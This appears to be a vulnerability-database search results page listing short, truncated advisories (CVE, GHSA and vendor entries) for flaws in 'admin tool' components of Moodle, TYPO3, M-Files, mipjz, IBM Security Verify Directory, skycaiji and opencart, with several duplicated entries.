152 matches found
BIT-MOODLE-2024-34001 moodle: CSRF risk in admin preset tool management of presets
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
CVE-2022-31050
TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, Admin Tool sessions initiated via the TYPO3 backend user interface had not been revoked even if the corresponding user account was degraded to lower permissions or disabled completely. This...
PT-2025-14853 · M Files · M-Files Server Admin Tool
Name of the Vulnerable Software and Affected Versions: M-Files Server Admin tool versions prior to 25.3.14681.7 Description: The issue concerns a stored XSS in the desktop UI of the M-Files Server Admin tool. This allows authenticated local users to execute scripts through the UI. Recommendations...
CVE-2024-48232
An issue was found in mipjz 5.0.5. In the mipPost method of \app\setting\controller\ApiAdminTool.php, the value of the postAddress parameter is not processed and is directly passed into curlexec execution and output, resulting in a Server-side request forgery SSRF vulnerability that can read serv...
PT-2024-33043 · Mipjz · Mipjz
Name of the Vulnerable Software and Affected Versions: mipjz version 5.0.5 Description: A Server-side request forgery SSRF vulnerability exists due to the improper handling of the postAddress parameter in the mipPost method of the ApiAdminTool.php file. This allows an attacker to read server file...
Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Directory (CVE-2022-32753, CVE-2022-32756, CVE-2022-32754)
Summary Security Vulnerabilities discovered in Web Admin Tool provided by IBM Security Verify Directory products have been resolved. Vulnerability Details CVEID:CVE-2022-32753 DESCRIPTION: IBM Security Verify Directory 10.0.0 uses weaker than expected cryptographic algorithms that could allow an...
CVE-2024-39241
Cross Site Scripting XSS vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview...
CVE-2024-39241
Cross Site Scripting XSS vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview...
skycaiji Security Breach
Skycaiji Blue Sky Collector is a free data collection and publishing crawler software from China Nanchang Zhuolan Technology Co., Ltd, developed with php+mysql, and can be deployed on cloud servers. A security vulnerability exists in skycaiji version 2.8, which originates from a cross-site...
BIT-OPENCART-2024-21515
This affects versions of the package opencart/opencart from 4.0.0-0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
Cross site scripting in opencart
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
GHSA-QX44-885H-7P56 Cross site scripting in opencart
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
CVE-2024-21515
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
CVE-2024-21515
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
CVE-2024-21515
CVE-2024-21515 affects opencart/opencart 4.0.0.0+. A reflected XSS in the filename parameter of the admin tool/log route could enable an attacker to trick an admin user into exposing a token, prompting login, and executing a payload after authentication. If the attacker has admin privileges, this...
Reflected Cross-site Scripting
Overview opencart/opencart is a shopping cart system Affected versions of this package are vulnerable to Reflected Cross-site Scripting. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to clic...
GHSA-8G5H-GJWQ-W5CH Moodle Logout CSRF in admin/tool/mfa/auth.php
The logout option within MFA did not include the necessary token to avoid the risk of users inadvertently being logged out via CSRF...
GHSA-GQ9F-8RJ4-W7JC Moodle CSRF risk in admin preset tool management of presets
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
CVE-2024-34001
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
CVE-2024-34001
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...